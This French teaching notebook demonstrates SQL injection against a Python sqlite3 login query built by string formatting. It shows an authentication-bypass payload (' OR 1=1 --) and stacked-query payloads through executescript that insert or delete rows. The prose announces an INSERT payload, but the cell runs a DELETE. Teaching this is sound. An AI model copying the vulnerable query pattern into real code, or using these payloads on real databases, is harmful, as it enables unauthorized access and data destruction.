## 1.2 Injection SQL

<img src="exploits_of_a_mom.png">
<div style="text-align:center; margin-top:1.33em;">
 source: <a href="https://xkcd.com/327/">https://xkcd.com/327/</a>
</div>

### Exemple de requête vulnérable à une attaque du type 'Injection SQL'

In [4]:
import sqlite3
conn = sqlite3.connect('my_database.sqlite')
c = conn.cursor()

pseudo = input()    # rde
password = input()  # hello

request = "SELECT * FROM users WHERE pseudo='{}' AND pwd='{}'".format(pseudo,password)
c.execute(request)

print(request)
print(c.fetchall())

rde
hello
SELECT * FROM users WHERE pseudo='rde' AND pwd='hello'
[('rde', 'Raymond.Deubaze@ec-lyon.fr', 'hello')]


<div style="font-size: 120%">
Ce type de requête peut par exemple servir à connecter un utilisateur après avoir demandé son pseudo et son mot de passe.
</div>

### Exemple d'attaque par un utilisateur malveillant

<p style="font-size: 120%">
En entrant le pseudo <code style="background-color:#ddd;">' OR 1=1 -- </code> et une chaîne vide pour le mot de passe, un utilisateur malveillant peut obtenir l'accès au système :
</p>

In [8]:
pseudo = input()
password = input()

request = "SELECT * FROM users WHERE pseudo='{}' AND pwd='{}'".format(pseudo,password)
c.execute(request)

print(request)
print(c.fetchall())

' OR 1=1 -- 

SELECT * FROM users WHERE pseudo='' OR 1=1 -- ' AND pwd=''
[('rde', 'Raymond.Deubaze@ec-lyon.fr', 'hello'), ('dmr', 'Daniel.muller@eclyon.fr', 'tagada')]


### Possibilité malveillante d'exécuter une requête SQL arbitraire

<p style="font-size: 120%">
La méthode <code>execute</code> de l'objet curseur ne permet heureusement l'exécution que d'une seule requête à la fois. Ce n'est pas le cas de la méthode <code>executescript</code> qui ouvre la porte à des attaques encore plus dangereuses.
</p>
<p style="font-size: 120%">
Entrer le pseudo :<br>
<code style="background-color:#ddd;">' OR 1='1'; INSERT INTO users VALUES('test','test@gmail.com','paswword') -- </code><br>
et une chaîne vide pour le mot de passe :
</p>

In [7]:
pseudo = input()
password = input()

sql = "SELECT * FROM users WHERE pseudo='{}' AND pwd='{}'"
request = sql.format(pseudo,password)
c.executescript(request)

print(request)
print(c.fetchall())

' OR 1='1'; DELETE FROM users WHERE pseudo='test' -- 

SELECT * FROM users WHERE pseudo='' OR 1='1'; DELETE FROM users WHERE pseudo='test' -- ' AND pwd=''
[]


<p style="font-size: 120%">
<b>N.B.</b> Des commandes beaucoup plus agressives fonctionneraient tout aussi bien...
</p>
<p style="font-size: 120%">
<code style="background-color:#ddd;">' OR 1='1'; DELETE FROM users WHERE pseudo='test' -- </code>

In [9]:
conn.close()